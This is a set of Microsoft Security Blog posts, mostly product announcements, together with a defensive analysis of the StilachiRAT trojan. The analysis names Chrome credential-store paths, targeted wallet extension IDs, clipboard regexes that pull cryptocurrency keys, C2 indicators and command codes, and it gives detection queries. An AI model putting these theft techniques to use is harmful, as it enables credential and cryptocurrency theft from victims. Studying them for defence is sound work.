Every organization that modernizes their identity strategy and authentication methods, as DOL did, strengthens security, improves flexibility, and reduces costs. Using a modern, deeply integrated security toolset will also provide valuable new insights. For example, you can use Conditional Access as a modeling and planning tool. By running policies in report-only mode, you can better understand your environment, investigate user behavior to uncover risk scenarios not visible to the human eye, and model solutions for those scenarios. This helps you decide which controls to apply to close any security gaps you discover.

DOL rolled out risk-based Conditional Access policies, in report-only mode, that enforce the use of passkeys by privileged users. In the activity reports, they observed employees signing in with their privileged accounts, then visiting portals that they should access as regular users, not as admins. DOL then adjusted their policies to block such behavior.

Running risk-based policies in report-only mode exposed behavior that DOL could then use policies to control. It also helped them to uncover inconsistencies and redundancies that reflected unaddressed technical debt; for example, policies that collided. Their goal is to consolidate and simplify their static policies into fewer, more comprehensive risk-based policies that block dangerous or unauthorized behavior while allowing employees to sign in faster and more securely to get their work done.

To learn more about Conditional Access report-only mode, visit our documentation.

Looking ahead

So far, DOL has integrated more than 200 applications with Entra ID for SSO. The team is still in the monitoring phase as they work to consolidate Conditional Access policies and ensure compliance with security requirements, such as the use of passkeys for accessing high-value assets. Not only are they reducing the number of policies they must maintain, but their logs are also cleaner, and it’s easier to find insights.

DOL’s future plans include implementing attestation, which will ensure that employees use a genuine version of the Authenticator app published by Microsoft before registering a passkey. They’re also investigating joining devices to Entra ID so they can centrally manage them from the cloud for easier deployment of updates, policies, and applications. This will also allow them to use policy to enforce enrollment in Windows Hello for Business, further advancing their transition to phishing-resistant authentication.

Learn more

Learn more about Microsoft Entra ID.

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us on LinkedIn (Microsoft Security) and X (@MSFTSecurity) for the latest news and updates on cybersecurity.

1Convincing a billion users to love passkeys: UX design insights from Microsoft to boost adoption and security, Sangeeta Ranjit and Scott Bingham. December 12, 2024.

The post US Department of Labor’s journey to Zero Trust security with Microsoft Entra ID appeared first on Microsoft Security Blog.

Categories: Microsoft

Microsoft unveils Microsoft Security Copilot agents and new protections for AI

Microsoft Malware Protection Center - Mon, 03/24/2025 - 12:00pm

In this age of AI, securing AI and using it to boost security are crucial for every organization. At Microsoft, we are dedicated to helping organizations secure their future with our AI-first, end-to-end security platform.

One year ago, we launched Microsoft Security Copilot to empower defenders to detect, investigate, and respond to security incidents swiftly and accurately. Now, we are excited to announce the next evolution of Security Copilot with AI agents designed to autonomously assist with critical areas such as phishing, data security, and identity management. The relentless pace and complexity of cyberattacks have surpassed human capacity and establishing AI agents is a necessity for modern security.

For example, phishing attacks remain one of the most common and damaging cyberthreats. Between January and December 2024, Microsoft detected more than 30 billion phishing emails targeting customers.1 The volume of these cyberattacks overwhelms security teams relying on manual processes and fragmented defenses, making it difficult to both triage malicious messages promptly and leverage data-driven insights for broader cyber risk management.

The phishing triage agent in Microsoft Security Copilot being unveiled today can handle routine phishing alerts and cyberattacks, freeing up human defenders to focus on more complex cyberthreats and proactive security measures. This is just one way agents can transform security.

Additionally, securing and governing AI continues to be the top priority for organizations, and we are excited to advance our purpose-built solutions with new innovations across Microsoft Defender, Microsoft Entra, and Microsoft Purview. 

Read on to learn about other agents we are introducing to Security Copilot and important developments in securing AI. 

Expanding Microsoft Security Copilot with AI agentic capabilities

Microsoft Threat Intelligence now processes 84 trillion signals per day, revealing the exponential growth in cyberattacks, including 7,000 password attacks per second.1 Scaling cyber defenses through AI agents is now an imperative to keep pace with this threat landscape. We are expanding Security Copilot with six security agents built by Microsoft and five security agents built by our partners—available for preview in April 2025.

Six new agentic solutions from Microsoft Security

Building on the transformative capabilities of Security Copilot, the six Microsoft Security Copilot agents enable teams to autonomously handle high-volume security and IT tasks while seamlessly integrating with Microsoft Security solutions. Purpose-built for security, agents learn from feedback, adapt to workflows, and operate securely—aligned to Microsoft’s Zero Trust framework. With security teams fully in control, agents accelerate responses, prioritize risks, and drive efficiency to enable proactive protection and strengthen an organization’s security posture.

Security Copilot agents will be available across the Microsoft end-to-end security platform, designed for the following:

  • Phishing Triage Agent in Microsoft Defender triages phishing alerts with accuracy to identify real cyberthreats and false alarms. It provides easy-to-understand explanations for its decisions and improves detection based on admin feedback.
  • Alert Triage Agents in Microsoft Purview triage data loss prevention and insider risk alerts, prioritize critical incidents, and continuously improve accuracy based on admin feedback.
  • Conditional Access Optimization Agent in Microsoft Entra monitors for new users or apps not covered by existing policies, identifies necessary updates to close security gaps, and recommends quick fixes for identity teams to apply with a single click.
  • Vulnerability Remediation Agent in Microsoft Intune monitors and prioritizes vulnerabilities and remediation tasks to address app and policy configuration issues and expedites Windows OS patches with admin approval.
  • Threat Intelligence Briefing Agent in Security Copilot automatically curates relevant and timely threat intelligence based on an organization’s unique attributes and cyberthreat exposure.

Security Copilot’s agentic capabilities are an example of how we continue to deliver innovation leveraging our decades of AI research. See how agents work.

“This is just the beginning; our security AI research is pushing the boundaries of innovation, and we are eager to continuously bring even greater value to our customers at the speed of AI.”  

—Alexander Stojanovic, Vice President of Microsoft Security AI Applied Research

Five new agentic solutions from Microsoft Security partners

Security is a team sport and Microsoft is committed to empowering our security ecosystem with an open platform upon which partners can build to deliver value to customers. In this spirit, the following five AI agents from our partners will be available in Security Copilot:

  • Privacy Breach Response Agent by OneTrust analyzes data breaches to generate guidance for the privacy team on how to meet regulatory requirements.
  • Network Supervisor Agent by Aviatrix performs root cause analysis and summarizes issues related to VPN, gateway, or Site2Cloud connection outages and failures.
  • SecOps Tooling Agent by BlueVoyant assesses a security operations center (SOC) and state of controls to make recommendations that help optimize security operations and improve controls, efficacy, and compliance.
  • Alert Triage Agent by Tanium provides analysts with the necessary context to quickly and confidently make decisions on each alert.
  • Task Optimizer Agent by Fletch helps organizations forecast and prioritize the most critical cyberthreat alerts to reduce alert fatigue and improve security.

“An agentic approach to privacy will be game-changing for the industry. Autonomous AI agents will help our customers scale, augment, and increase the effectiveness of their privacy operations. Built using Microsoft Security Copilot, the OneTrust Privacy Breach Response Agent demonstrates how privacy teams can analyze and meet increasingly complex regulatory requirements in a fraction of the time required historically.”

—Blake Brannon, Chief Product and Strategy Officer, OneTrust

Learn more about Security Copilot agents and get started with Security Copilot. Current Security Copilot customers can join our Customer Connection Program for the latest updates.

New AI-powered data security investigations and analysis   

We are also announcing Microsoft Purview data security investigations to help data security teams quickly understand and mitigate risks associated with sensitive data exposure. Data security investigations introduce AI-powered deep content analysis, which identifies sensitive data and other risks linked to incidents. Incident investigators can use these insights to collaborate securely with partner teams and simplify complex and time-consuming tasks, thus improving mitigation. This solution links data security investigations to Defender incidents and Purview insider risk cases—available for preview starting April 2025.  

Further advances in securing and governing generative AI

Successful AI transformation requires a strong cybersecurity foundation. As organizations rapidly adopt generative AI, there is growing urgency to secure and govern the creation, adoption, and use of AI in the workplace. According to our new report, “Secure employee access in the age of AI,” 57% of organizations report an increase in security incidents from AI usage. And while most organizations recognize the need for AI controls, 60% have not yet started.

Securing AI is still a relatively new challenge, and leaders share some specific concerns: how to prevent data oversharing and leakage; how to minimize new AI threats and vulnerabilities; and how to comply with shifting regulatory compliance requirements. Microsoft Security solutions are purpose-built for AI to help every organization address these concerns. We’re announcing new advanced capabilities so that organizations can secure their AI investments—both Microsoft AI and other AI.

AI security posture management for multimodel and multicloud environments

Organizations developing their own custom AI solutions will need to strengthen the security posture for AI that they source from multiple models, running in multiple AI platforms and clouds. To address this need, Microsoft Defender has extended AI security posture management beyond Microsoft Azure and Amazon Web Services to include Google VertexAI and all models in the Azure AI Foundry model catalog. Available for preview in May 2025, this coverage includes Gemini, Gemma, Meta Llama, Mistral, and custom models. With new multicloud interoperability, organizations will gain broader code-to-runtime AI security posture visibility across Microsoft Azure, Amazon Web Services, and Google Cloud. Microsoft Defender can give organizations a jumpstart to securing AI posture across multimodel and multicloud environments.

New detection and protection for emerging AI threats

With AI comes new risks, including new cyberattack surfaces and unknown vulnerabilities. The Open Worldwide Application Security Project (OWASP) identifies the highest priority risks and mitigations for generative AI apps. Starting in May 2025, new and enriched AI detections for several risks identified by OWASP such as indirect prompt injection attacks, sensitive data exposure, and wallet abuse will be generally available in Microsoft Defender. With these new detections, SOC analysts can better protect and defend custom-built AI apps with new safeguards for Azure OpenAI Service and models found in the Azure AI Foundry catalog.

New controls to prevent risky access and data leaks into shadow AI apps

With the rapid user adoption of generative AI, many organizations are uncovering widespread use of AI apps that have not yet been approved by IT or security teams. This unsanctioned, unprotected use of AI has created a “shadow AI” phenomenon, which has drastically increased the risk of sensitive data leakage. We are announcing general availability of AI web category filter in Microsoft Entra internet access to help enforce granular access controls that can curb the risk of shadow AI by enforcing policies governing which users and groups have access to different types of AI applications.

With policy enforcement in place to govern authorized access to AI apps, the next layer of defense is to prevent users from leaking sensitive data into AI apps. To address this, we are announcing the preview of Microsoft Purview browser data loss prevention (DLP) controls built into Microsoft Edge for Business. This helps security teams enforce DLP policies to prevent sensitive data from being typed into generative AI apps, starting with ChatGPT, Copilot Chat, DeepSeek, and Google Gemini.

Learn more about our new innovations in Security for AI.

New phishing protection in Microsoft Teams for safer collaboration

While email continues to be the primary cyberthreat vector for phishing, collaboration software has become a common target. Generally available in April 2025, Microsoft Defender for Office 365 will protect users against phishing and other advanced cyberthreats within Teams. With inline protection, Teams will have better protection against malicious URLs, including real-time detonation of attachments and links. And to give SOC teams full visibility into related attempts and incidents, alerts and data will be available in Microsoft Defender. 

Agile innovation to build a safer world

We continue to innovate across the Microsoft Security portfolio, applying the principles of our Secure Future Initiative, to deliver powerful, end-to-end protection to give defenders industry-leading AI, and to empower every organization with the tools to secure and govern AI. We are grateful for our customers and partners and together, with them, we look forward to building a more secure world for all.

Microsoft Secure

To see these innovations in action, join us on April 9, 2025 for Microsoft Secure, a digital event focused on security in the age of AI. 

Register now Learn with Microsoft Security

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us on LinkedIn (Microsoft Security) and X (@MSFTSecurity) for the latest news and updates on cybersecurity.

1Based on Microsoft internal data.

The post Microsoft unveils Microsoft Security Copilot agents and new protections for AI appeared first on Microsoft Security Blog.

Categories: Microsoft

AI innovation requires AI security: Hear what’s new at Microsoft Secure

Microsoft Malware Protection Center - Tue, 03/18/2025 - 12:00pm

When you’re secure—innovation happens. But, the fast pace of AI often outpaces traditional security measures, leaving gaps that bad actors can take advantage of. As a security professional, you’re the hero in this battle between protecting vast amounts of data while ensuring AI systems remain transparent and compliant. What you need in this time of new threats and complexity in securing interconnected AI applications is a proactive, innovative approach to stay ahead. 

That’s why we’re excited to invite you to Microsoft Secure on April 9, a one-hour online event designed specifically for professionals like you. At Microsoft Secure, discover AI innovations for the security lifecycle designed to give you smarter, faster, stronger security.  

Why should you attend? 

At Microsoft Secure, you’ll get a first look into AI-first tools coming soon to help you in your day-to-day work. Plus, we’ll share how you can maximize what you’ve got in your hands right now.   

In 60 minutes, you’ll learn how you can: 

  • Harden your defenses: Learn how to secure your data used by AI, AI apps, and AI cloud workloads. Discover the latest tools and techniques to fortify your defenses against evolving threats. 
  • Secure your AI investments: Use data security, protection against AI-specific cyberthreats, and compliance tools to secure your AI investments. Our experts will share best practices and strategies to safeguard your AI initiatives, ensuring they remain resilient against emerging threats. 
  • Discover AI-first tools and best practices: Hear about new AI-first tools, demos, and best practices across your favorite Microsoft Security solutions. These sessions will provide you with practical insights and hands-on experiences to strengthen your security posture and leverage AI-driven solutions effectively.  
  • Keep up with what’s happening in security: Get the latest reports on security trends and platform innovations directly from Microsoft Security leaders. This is your chance to gain insights that can help you stay ahead of emerging threats. 

What can you expect? 

Led by security experts, Microsoft Secure is your chance to find out how to use solutions that can help you operate efficiently, stay compliant, and be more secure. 

  • Hear from organizations like yours: Explore compelling customer stories that showcase how end-to-end security can boost, not burden, your teams. These real-world examples will highlight the benefits of comprehensive security solutions and demonstrate how they can enhance productivity and efficiency without compromising on safety. 
  • Engage with Microsoft Security experts: Engage with Microsoft Security experts through live Q&A sessions. This interactive format will allow you to connect directly with our experts, ask questions, and gain valuable insights tailored to your specific needs. 

[Insert image with speaker lineup] 

Check out the full agenda here

Microsoft Secure is more than just an event; it’s a community of like-minded professionals dedicated to moving the field of cybersecurity forward. Join us to get valuable insights, discover innovative solutions, and connect with industry leaders and peers who share your passion for security. Don’t miss this opportunity to elevate your security game and make a real impact in your organization. 

Join us on April 9, 2025? Register now and pick the broadcast that works for your time zone. 

Microsoft Secure 

Wednesday, April 9, 2025 

8:00 AM-9:00 AM Pacific Time (UTC-7) 

Thursday, April 10, 2025  

10:00 AM – 11:00 AM Central European Time (GMT+1) 

Thursday, April 10, 2025  

12:00 PM – 1:00 PM Singapore Time (GMT+8) 

The post AI innovation requires AI security: Hear what’s new at Microsoft Secure appeared first on Microsoft Security Blog.

Categories: Microsoft

StilachiRAT analysis: From system reconnaissance to cryptocurrency theft

Microsoft Malware Protection Center - Mon, 03/17/2025 - 1:00pm

In November 2024, Microsoft Incident Response researchers uncovered a novel remote access trojan (RAT) we named StilachiRAT that demonstrates sophisticated techniques to evade detection, persist in the target environment, and exfiltrate sensitive data. Analysis of the StilachiRAT’s WWStartupCtrl64.dll module that contains the RAT capabilities revealed the use of various methods to steal information from the target system, such as credentials stored in the browser, digital wallet information, data stored in the clipboard, as well as system information.

Microsoft has not yet attributed StilachiRAT to a specific threat actor or geolocation. Based on Microsoft’s current visibility, the malware does not exhibit widespread distribution at this time. However, due to its stealth capabilities and the rapid changes within the malware ecosystem, we are sharing these findings as part of our ongoing efforts to monitor, analyze, and report on the evolving threat landscape.

Microsoft security solutions can detect activities related to attacks that use StilachiRAT. To help defenders protect their network, we are also sharing mitigation guidance to help reduce the impact of this threat, detection details, and hunting queries. Microsoft continues to monitor information on the delivery vector used in these attacks. Malware like StilachiRAT can be installed through multiple vectors; therefore, it is critical to implement security hardening measures to prevent the initial compromise. 

This blog presents our detailed findings on all the key capabilities of StilachiRAT, which include:

  • System reconnaissance: Collects comprehensive system information, including operating system (OS) details, hardware identifiers, camera presence, active Remote Desktop Protocol (RDP) sessions, and running graphical user interface (GUI) applications, allowing detailed profiling of the target system.
  • Digital wallet targeting: Scans for configuration data of 20 different cryptocurrency wallet extensions for the Google Chrome browser.
  • Credential theft: Extracts and decrypts saved credentials from Google Chrome, gaining access to usernames and passwords stored in the browser.
  • Command-and-control (C2) connectivity: Establishes communication with remote C2 servers using TCP ports 53, 443, or 16000, enabling remote command execution and potentially SOCKS like proxying.
  • Command execution: Supports a variety of commands from the C2 server, including system reboots, log clearing, registry manipulation, application execution, and system suspension.
  • Persistence mechanisms: Achieves persistence through the Windows service control manager (SCM) and uses watchdog threads to ensure self-reinstatement if removed.
  • RDP monitoring: Monitors RDP sessions, capturing active window information and impersonating users, allowing for potential lateral movement within networks.
  • Clipboard and data collection: Continuously monitors clipboard content, actively searching for sensitive data like passwords and cryptocurrency keys, while tracking active windows and applications.
  • Anti-forensics and evasion: Employs anti-forensic tactics by clearing event logs, detecting analysis tools, and implementing sandbox-evading behaviors to avoid detection.
Technical analysis of key capabilities System reconnaissance

StilachiRAT gathers extensive system information, including OS details, device identifiers, BIOS serial numbers, and camera presence. Information is collected through the Component Object Model (COM) Web-based Enterprise Management (WBEM) interfaces using WMI Query Language (WQL). Below are some of the queries it executes:

Serial number

Camera

OS / System info (server, model, manufacturer)

Additionally, the malware creates a unique identification on the infected device that is derived from the system’s serial number and attackers’ public RSA key. The information is stored in the registry under a CLSID key.

Figure 1. Example of a unique ID stored in the registry Digital wallet targeting

StilachiRAT targets a list of specific cryptocurrency wallet extensions for the Google Chrome browser. It accesses the settings in the following registry key and validates if any of the extensions are installed:

\SOFTWARE\Google\Chrome\PreferenceMACs\Default\extensions.settings

The malware targets the following cryptocurrency wallet extensions:

Cryptocurrency wallet extension nameChrome extension identifierBitget Wallet (Formerly BitKeep)jiidiaalihmmhddjgbnbgdfflelocpakTrust WalletegjidjbpglichdcondbcbdnbeeppgdphTronLinkibnejdfjmmkpcnlpebklmnkoeoihofecMetaMask (ethereum)nkbihfbeogaeaoehlefnkodbefgpgknnTokenPocketmfgccjchihfkkindfppnaooecgfneiiiBNB Chain WalletfhbohimaelbohpjbbldcngcnapndodjpOKX WalletmcohilncbfahbmgdjkbpemcciiolgcgeSui WalletopcgpfmipidbgpenhmajoajpbobppdilBraavos – Starknet WalletjnlgamecbpmbajjfhmmmlhejkemejdmaCoinbase WallethnfanknocfeofbddgcijnmhnfnkdnaadLeap Cosmos WalletfcfcfllfndlomdhbehjjcoimbgofdncgManta WalletenabgbdfcbaehmbigakijjabdpdnimlgKeplrdmkamcknogkgcdfhhbddcghachkejeapPhantombfnaelmomeimhlpmgjnjophhpkkoljpaCompass Wallet for SeianokgmphncpekkhclmingpimjmcooifbMath WalletafbcbjpbpfadlkmhmclhkeeodmamcflcFractal WalletagechnindjilpccclelhlbjphbgnobpfStation WalletaiifbnbfobpmeekipheeijimdpnlpgppConfluxPortalbjiiiblnpkonoiegdlifcciokocjbhkdPlugcfbfdhimifdmdehjmkdobpcjfefblkjm Credential theft

StilachiRAT extracts Google Chrome’s encryption_key from the local state file in a user’s directory. However, since the key is encrypted when Chrome is first installed, it uses Windows APIs that rely on current user’s context to decrypt the master key. This allows access to the stored credentials in the password vault. The stored credentials are extracted from the following locations:

  • %LOCALAPPDATA%\Google\Chrome\User Data\Local State – stores Chrome’s configuration data, including the encrypted key.
  • %LOCALAPPDATA%\Google\Chrome\User Data\Default\Login Data – stores entered user credentials.

The “Login Data stores information using an SQLite database and the malware retrieves credentials using the following query:

Command-and-control (C2)

There are two configured addresses for the C2 server – one is stored in obfuscated form and the other is an IP address converted to its binary format (instead of a regular string):

  • app.95560[.]cc
  • 194.195.89[.]47

The communications channel is established using TCP ports 53, 443, or 16000, selected randomly. Additionally, the malware checks for presence of tcpview.exe and will not proceed if one is present. It also delays initial connection by two hours, presumably to evade detection. Once connected, a list of active windows is sent to the server. Additional technical findings regarding C2 communications functionality are listed in the section below.

Figure 2. The malware delays connection to evade detection Persistence mechanisms

StilachiRAT can be launched both as a Windows service or a standalone component. In both cases, there is a mechanism in place to ensure the malware isn’t removed.

A watchdog thread monitors both the EXE and dynamic link library (DLL) files used by the malware by periodically polling for their presence. If found absent, the files can be recreated from an internal copy obtained during initialization. Lastly, the Windows service component can be recreated by modifying the relevant registry settings and restarting it through the SCM.

Figure 3. Monitoring for the presence of EXE and DLL files

Figure 4. Start the malware via SCM RDP monitoring

StilachiRAT monitors RDP sessions by capturing foreground window information and duplicating security tokens to impersonate users. This is particularly risky on RDP servers hosting administrative sessions as it could enable lateral movement within networks.

The malware obtains the current session and actively launches foreground windows as well as enumerates all other RDP sessions. For each identified session, it will access the Windows Explorer shell and duplicate its privileges or security token. The malware then gains capabilities to launch applications with these newly obtained privileges.

Figure 5. Enumerate RDP sessions

Figure 6. Launch process as another user Data collection

StilachiRAT collects a variety of user data, including software installation records and active applications. It monitors active GUI windows, their title bar text, and file location, and sends this information to the C2 server, potentially allowing attackers to track user behavior.

Figure 7. Registry path for installed software Figure 8. Read the title of an application window Clipboard monitoring

StilachiRAT has a functionality that is responsible for monitoring clipboard data. Specifically, the malware can periodically read the clipboard, extract text based on search expressions, and then exfiltrate this data. Clipboard monitoring is continuous, with targeted searches for sensitive information such as passwords, cryptocurrency keys, and potentially personal identifiers.

The list below includes the regular search expressions used to extract certain credentials. These are associated with the Tron Cryptocurrency blockchain that is popular in Asia, especially in China.

Credential Regular expression to extract credential                                TRX Address `\bT[0-9a-zA-Z]{33}\b`                                      TRX Key     `\b(0x)?[0-9a-fA-F]{64}\b`                                  TRX Pass    `^\s*\b([0-9]*[.]*[a-wy-z][a-z]{2,}[ \t]*\b){12}\s*(\n\$)` TRX Pass    `^\s*\b([0-9]*[.]*?[a-wy-z][a-z]{2,}\s*\b){12}\s*(\n\$)` Figure 9. Access clipboard data Figure 10. Modify clipboard data

The same search expressions are then used to iterate files in the following locations:

  • %USERPROFILE%\Desktop
  • %USERPROFILE%\Recent
Figure 11. Access user’s files Anti-forensic measures

StilachiRAT displays anti-forensic behavior by clearing event logs and checking certain system conditions to evade detection. This includes looping checks for analysis tools and sandbox timers that prevent its full activation in virtual environments commonly used for malware analysis.

Additionally, Windows API calls are obfuscated in multiple ways and a custom algorithm is used to encode many text strings and values. This significantly slows down analysis time since extrapolating higher level logic and code design becomes a more complex effort.

The malware employs API-level obfuscation techniques to impede manual analysis, specifically by concealing its use of Windows APIs (e.g., RegOpenKey()). Instead of referencing API names directly, it encodes them as checksums that are resolved dynamically at runtime. While this is a common technique in malware, the authors have introduced additional layers of obfuscation.

Precomputed API checksums are stored in multiple lookup tables, each masked with an XOR value. During launch, the malware selects the appropriate table based on the hashed API name, applies the correct XOR mask to decode the value, and dynamically resolves the corresponding Windows API function. The resolved function pointer is then cached, but with an additional XOR mask applied, preventing straightforward memory scans from identifying API references.

Figure 12. Example of two function calls that resolve **Sleep()** and **AllocConsole()** Windows APIs Figure 13. Function that initiates API resolution by identifying the correct lookup table for the checksum Commands launched from the C2 server

StilachiRAT can launch various commands received from the C2 server. These commands include system reboot, log clearing, credential theft, executing applications, and manipulating system windows. Additionally, it can suspend the system, modify Windows registry values, and enumerate open windows, indicating a versatile command set for both espionage and system manipulation. The C2 server’s command structure assigns specific numbers to what commands it will initiate. The following section presents details on the said commands.

07 – Dialog box

Uses the Windows API function ShowHTMLDialogEx() to display a dialog box with rendered HTML contents from a supplied URL.

Figure 14. Display a message box 08 – Log clearing

Given an event log type, the relevant Windows APIs are used to open and then clear the log entries.

Figure 15. Clear event logs 09 – System reboot

Adjusts its own executing privileges to enable system shutdown and uses an undocumented Windows API to perform the action.

Figure 16. Shutdown the PC 13 – Network sockets

Appears to contain capability to receive a network address from C2 server and establish a new outbound connection.

14 – TCP incoming

Accepts an incoming network connection on the supplied TCP port.

15 – Terminate

If there’s an open network connection, then close it and disable the Windows service controlling this process. This appears to be the self-removal (uninstall) command.

16 – Initiate application

The malware creates a console window and initiates a command to launch the program provided by the C2 operator using the WinExec() API.

Figure 17. Initiate a program 19 – Enumerate Windows

Iterates all windows of the current desktop to look for a requested title bar text. This might allow the operator to access specific GUI applications and their contents, both onscreen and clipboard.

26 – Suspend

Uses the SetSuspendState() API to put the system into either a suspended (sleep) state or hibernation.

30 – Chrome credentials

Launches the earlier mentioned functionality to steal Google Chrome passwords.

Mitigations

Malware like StilachiRAT can be installed through various vectors. The following mitigations can help prevent this type of malware from infiltrating the system and reduce the attack surface:

  • In some cases, RATs can masquerade as legitimate software or software updates. Always download software from the official website of the software developer or from reputable sources.
  • Encourage users to use Microsoft Edge and other web browsers that support SmartScreen, which identifies and blocks malicious websites, including phishing sites, scam sites, and sites that host malware.
  • Turn on Safe Links and Safe Attachments for Office 365. In organizations with Microsoft Defender for Office 365, Safe Links scanning protects your organization from malicious links that are used in phishing and other attacks. Specifically, Safe Links provides URL scanning and rewriting of inbound email messages during mail flow, and time-of-click verification of URLs and links in email messages, Microsoft Teams, and supported Office 365 apps. Safe Attachments provides an additional layer of protection for email attachments that have already been scanned by anti-malware protection in Exchange Online Protection (EOP).
  • Enable network protection in Microsoft Defender for Endpoint to prevent applications or users from accessing malicious domains and other malicious content on the internet. You can audit network protection in a test environment to view which apps would be blocked before enabling network protection.

General hardening guidelines:

  • Ensure that tamper protection is enabled in Microsoft Dender for Endpoint.
  • Run endpoint detection and response in block mode so that Microsoft Defender for Endpoint can block malicious artifacts, even when your non-Microsoft antivirus does not detect the threat or when Microsoft Defender Antivirus is running in passive mode.
  • Configure investigation and remediation in full automated mode to let Microsoft Defender for Endpoint take immediate action on alerts to resolve breaches, significantly reducing alert volume.
  • Turn on Potentially unwanted applications (PUA) protection in block mode in Microsoft Defender Antivirus. PUA are a category of software that can cause your machine to run slowly, display unexpected ads, or install other software that might be unexpected or unapproved.
  • Turn on cloud-delivered protection in Microsoft Defender Antivirus or the equivalent for your antivirus product to cover rapidly evolving attacker tools and techniques.
  • Turn on Microsoft Defender Antivirus real-time protection.
Microsoft Defender XDR detections

Microsoft Defender XDR customers can refer to the list of applicable detections below. Microsoft Defender XDR coordinates detection, prevention, investigation, and response across endpoints, identities, email, apps to provide integrated protection against attacks like the threat discussed in this blog.

Customers with provisioned access can also use Microsoft Security Copilot in Microsoft Defender to investigate and respond to incidents, hunt for threats, and protect their organization with relevant threat intelligence.

Microsoft Defender Antivirus

Microsoft Defender Antivirus detects this threat as the following malware:

  • TrojanSpy:Win64/Stilachi.A
Microsoft Defender for Endpoint

The following alerts might indicate threat activity related to this threat. Note, however, that these alerts can be also triggered by unrelated threat activity.

  • A process was injected with potentially malicious code
  • Process hollowing detected
  • Suspicious service launched
  • Possible theft of passwords and other sensitive web browser information
Microsoft Security Copilot

Security Copilot customers can use the standalone experience to create their own prompts or run the following pre-built promptbooks to automate incident response or investigation tasks related to this threat:

  • Incident investigation
  • Microsoft User analysis
  • Threat actor profile
  • Threat Intelligence 360 report based on MDTI article
  • Vulnerability impact assessment

Note that some promptbooks require access to plugins for Microsoft products such as Microsoft Defender XDR or Microsoft Sentinel.

Hunting queries Microsoft Defender XDR

Microsoft Defender XDR customers can run the following query to find related activity in their networks:

Look for suspicious outbound network connections

Monitor network traffic for malicious activity caused by remote access trojans by focusing on identifying unusual outbound connections, irregular port activity, and suspicious data exfiltration patterns that may indicate RAT presence.

Outbound ports associated with common data transfer protocols such as HTTP/HTTPS (port 80/443), SMB (port 445), and DNS (port 53) or less common ports like 16000 used for specific applications and services for network communications might indicate such activity.

let domains = dynamic(['domain1', 'domain2', 'domain3']); DeviceNetworkEvents | where RemotePort in (53, 443, 16000) | where Protocol == "Tcp" | where RemoteUrl has_any (domains) | project Timestamp, DeviceName, RemoteIP, RemotePort, InitiatingProcessCommandLine, ActionType, DeviceId, LocalIP, RemoteUrl, InitiatingProcessFileName

Look for signs of persistence

The malware can be run both as a Windows Service or a standalone component. To identify persistence and suspicious services, monitor for the following event IDs:

  • Event ID 7045 – a new service was installed on the system. Monitor for suspicious services.
  • Event ID 7040 – start type of a service is changed (boot, on-request). Boot may be a vector for the RAT to persist during a system reboot. On request indicates that the process must request the SCM to start the service.
  • Correlated with Event ID 4697 – a service was installed on the system (Security log)
DeviceEvents |where ActionType == “ServiceInstalled” | project Timestamp, DeviceId,ActionType, FileName, FolderPath, InitiatingProcessCommandLine

Look for anti-forensic behavior

To identify potential event log clearing, monitor for the following event IDs:

  • Event ID 1102 (Security log)
  • Event ID 104 (System log)
Microsoft Sentinel

Microsoft Sentinel customers can use the TI Mapping analytics (a series of analytics all prefixed with ‘TI map’) to automatically match the malicious domain/IP/Hash indicators mentioned in this blog post with data in their workspace. If the TI Map analytics are not currently deployed, customers can install the Threat Intelligence solution from the Microsoft Sentinel Content Hub to have the analytics rule deployed in their Sentinel workspace.

Additionally, Sentinel users can use the following query to detect when the security event log has been cleared, a potential indicator of an attempt to erase system evidence.

SecurityEvent | where EventID == 1102 and EventSourceName == "Microsoft-Windows-Eventlog" | summarize StartTimeUtc = min(TimeGenerated), EndTimeUtc = max(TimeGenerated), EventCount = count() by Computer, Account, EventID, Activity | extend HostName = tostring(split(Computer, ".")[0]), DomainIndex = toint(indexof(Computer, '.')) | extend HostNameDomain = iff(DomainIndex != -1, substring(Computer, DomainIndex + 1), Computer) | extend AccountName = tostring(split(Account, @'\')[1]), AccountNTDomain = tostring(split(Account, @'\')[0])

Sentinel users can also use the following query to detect service installations or modifications in service settings, which may indicate potential persistence mechanisms used by attackers.

Event // 7045: A service was installed in the system // 7040: A service setting has been changed | where Source == "Service Control Manager" | where EventID in ( '7045', '7040') | parse EventData with * 'ServiceName">' ServiceName "<" * 'ImagePath">' ImagePath "<" * | parse EventData with * 'AccountName">' AccountName "<" * | summarize StartTime = min(TimeGenerated), EndTime = max(TimeGenerated) by EventID, Computer, ServiceName, ImagePath, AccountName Indicators of compromise IndicatorTypeDescription394743dd67eb018b02e069e915f64417bc1cd8b33e139b92240a8cf45ce10fcbSHA-256WWStartupCtrl64.dll194.195.89[.]47  IP addressC2app.95560[.]cc  Domain nameC2

Learn more

For the latest security research from the Microsoft Threat Intelligence community, check out the Microsoft Threat Intelligence Blog: https://aka.ms/threatintelblog.

To get notified about new publications and to join discussions on social media, follow us on LinkedIn at https://www.linkedin.com/showcase/microsoft-threat-intelligence, and on X (formerly Twitter) at https://x.com/MsftSecIntel.

To hear stories and insights from the Microsoft Threat Intelligence community about the ever-evolving threat landscape, listen to the Microsoft Threat Intelligence podcast: https://thecyberwire.com/podcasts/microsoft-threat-intelligence.

Microsoft is committed to delivering comprehensive customer experience through various Microsoft Offerings. Our approach goes beyond traditional support by focusing on detection, prevention, and in-depth mitigation to help customers quickly respond to security incidents and build resiliency. Want to know how to Build a More Secure Tomorrow? Check our Unified and Security eBook and visit https://aka.ms/Unified

Dmitriy Pletnev and Daria Pop
Microsoft Incident Response

The post StilachiRAT analysis: From system reconnaissance to cryptocurrency theft appeared first on Microsoft Security Blog.

Categories: Microsoft

How MSRC coordinates vulnerability research and disclosure while building community

Microsoft Malware Protection Center - Thu, 03/13/2025 - 12:00pm

In an era where discovering and rapidly mitigating security vulnerabilities is more important than ever before, the Microsoft Security Response Center (MSRC) is at the center of this work. MSRC focuses on investigating vulnerabilities, coordinating their disclosure, and releasing security updates to help protect customers and Microsoft from current and emerging cyberthreats related to security and privacy. MSRC partners with product teams across Microsoft—as well as external security researchers—to investigate reports of security vulnerabilities affecting Microsoft products and services.

Learn more about the Microsoft Security Response Center

MSRC also fosters the development of a stronger and more effective security researcher community through a variety of initiatives, including the Microsoft bug bounty program, the BlueHat security conference, the MSRC blog, and internal security training for engineers.

Microsoft uses a Coordinated Vulnerability Disclosure (CVD) process that recognizes security researchers while disclosing vulnerabilities in a responsible and timely manner.

